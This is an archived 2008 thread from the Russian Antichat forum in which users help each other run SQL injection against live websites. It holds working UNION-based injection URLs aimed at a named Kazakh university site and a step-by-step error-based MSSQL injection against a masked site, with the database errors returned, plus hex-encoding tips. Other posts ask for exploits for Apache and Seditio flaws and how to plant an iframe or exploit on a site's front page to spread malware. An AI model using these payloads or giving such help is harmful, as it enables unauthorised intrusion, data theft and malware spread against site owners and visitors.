ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
07.03.2008, 21:38
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
2 truelamer
Имхо инъекция в лимите ,да ещё после ORDER так-что врятли
|
|
|
08.03.2008, 20:18
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
http://www.kaznpu.kz/kz/?annons=-1+union+select+TABLE_NAME+from+INFORMATION_SCHEMA. TABLES+limit+20,1/*
выдало таблицу: moderator
Почему вот этот не проходит:
http://www.kaznpu.kz/kz/?annons=-1+union+select+COLUMN_NAME+from+INFORMATION_SCHEMA .COLUMNS+where+TABLE_NAME=moderator+limit+0,1/*
|
|
|
|
08.03.2008, 20:20
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357
Репутация:
3742
|
|
table_name='moderator' или в hex
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
08.03.2008, 20:22
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
Сообщение от blackybr
table_name='moderator' или в hex
Спасибо! +1
|
|
|
|
09.03.2008, 01:02
|
|
Новичок
Регистрация: 06.01.2008
Сообщений: 15
Провел на форуме:
29345
Репутация:
35
|
|
У меня такой вопрос:
База даных : Mssql.
Я пробывать зделать по этой стате :
http://forum.antichat.ru/thread30501-mssql.html
Первый этап прошол:
www.*****.com/?id=1'
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'application'.
/index.asp, line 89
второй :
www.*****.com/?id=1'%20or%201=(select%20db_name())--
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'player' to a column of data type int.
/index.asp, line 89
третий:
www.****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES)--
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'points' to a column of data type int.
/index.asp, line 89
четвёртый:
www.*****.com/?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMAT ION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('points '))--
Microsoft OLE DB Provider for SQL Server error '80040e07'
Syntax error converting the nvarchar value 'points' to a column of data type int.
/index.asp, line 89
Пятый:
И тут я застрял,надо:
id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATIO N_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+('table1', 'table2',........,'table50'))--
Что то у меня не получилось и я получил:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Line 1: Incorrect syntax near 'table1'.
/index.asp, line 89
Что мне дальше делать,или где моя ошибка?
Огромное спасибо!
|
|
|
|
09.03.2008, 01:26
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Вы ,что господа сговорились? Посмотри на пост выше ,скорее всего та-же проблема.
Т.е. Hex
|
|
|
|
09.03.2008, 03:19
|
|
Новичок
Регистрация: 04.12.2007
Сообщений: 6
Провел на форуме:
37345
Репутация:
1
|
|
Выручайте.Нашел в сайте Apache , chunked encoding уязвимость.(если баян, ногами не пинать).Что нужно для взлома (эксплоит, или еще что то)?
Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?
|
|
|
|
09.03.2008, 08:12
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
ВОпрост такое вообще взламывается?
Server Error in '/' Application.
Input string was not in a correct format.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
Exception Details: System.FormatException: Input string was not in a correct format.
Source Error:
An unhandled exception was generated during the execution of the current web request. Information regarding the origin and location of the exception can be identified using the exception stack trace below.
Stack Trace:
[FormatException: Input string was not in a correct format.]
System.Number.ParseInt32(String s, NumberStyles style, NumberFormatInfo info) +0
System.Convert.ToInt32(String value) +47
ustu.subs.Page_Load(Object sender, EventArgs e) in \\snatch\c$\Inetpub\dynamic\ustu.ru\subs.ascx.cs:3 8
System.Web.UI.Control.OnLoad(EventArgs e) +67
System.Web.UI.Control.LoadRecursive() +35
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Control.LoadRecursive() +98
System.Web.UI.Page.ProcessRequestMain() +750
Version Information: Microsoft .NET Framework Version:1.1.4322.2407; ASP.NET Version:1.1.4322.2407
|
|
|
|
09.03.2008, 09:24
|
|
Moderator - Level 7
Регистрация: 22.09.2006
Сообщений: 531
Провел на форуме:
3818187
Репутация:
369
|
|
народ подскажите неучу.
вот есть у меня скуль инекция как мне на индех.пхп повесить ифрейм или там сплойтег или че нить такое карочь изменить?
Сообщение от +toxa+
Никак. Тока если у тебя не инъекция через insert или update, затрагивающая, например, таблицу с новостями, выводящимися на главную
да я тут просто решил затроянить инет  не знаю че делать на ФТП денег у менянету а другие способы загрузок я не знаю
не подскажеШЬ?КАК ЕЩЕ МОЖНО ИНСТАЛИТЬ
Последний раз редактировалось satana8920; 09.03.2008 в 09:48..
|
|
|
|
09.03.2008, 09:36
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379
Репутация:
3812
|
|
Никак. Тока если у тебя не инъекция через insert или update, затрагивающая, например, таблицу с новостями, выводящимися на главную
Сообщение от Zergius
Выручайте.Нашел в сайте Apache , chunked encoding уязвимость.(если баян, ногами не пинать).
Ну если ты нашёл, то ты и должен знать что это за уязвимость и как её использовать.
Нашел в Seditio SQL инъекцию (2).Опятьже прошу дать ссылку, или обьяснить, как эту дырку использовать (на сайте и в поиске не нашел)...И еще : как исправить SQL инъекцию?[/QUOTE]
Опять же, если нашёл, то должен знать как использовать.
http://injection.rulezz.ru/
__________________
Последний раз редактировалось +toxa+; 09.03.2008 в 09:44..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
